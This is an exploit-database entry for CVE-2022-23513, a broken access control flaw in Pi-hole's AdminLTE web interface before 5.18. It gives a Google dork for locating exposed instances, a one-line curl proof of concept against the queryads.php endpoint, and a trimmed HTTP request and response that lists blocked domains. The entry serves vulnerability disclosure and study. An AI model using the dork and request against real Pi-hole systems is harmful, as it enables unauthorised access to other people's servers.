AdminLTE PiHole < 5.18 - Broken Access Control

vendor:

PiHole

by:

kv1to

N/A

CVSS

N/A

Broken Access Control

Unknown

CWE

Product Name: PiHole

Affected Version From: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-2022-23513

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Raspbian / Debian

2022

AdminLTE PiHole < 5.18 - Broken Access Control

In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
# Date: 21.12.2022
# Exploit Author: kv1to
# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
# Tested on: Raspbian / Debian
# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
# CVE : CVE-2022-23513

In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.

## Proof Of Concept with curl:
curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'

## HTTP requests
GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1
HOST: pi.hole
Cookie: [..SNIPPED..]
[..SNIPPED..]

## HTTP Response
HTTP/1.1 200 OK
[..SNIPPED..]

data: Match found in [..SNIPPED..]
data: <domain>
data: <domain>
data: <domain>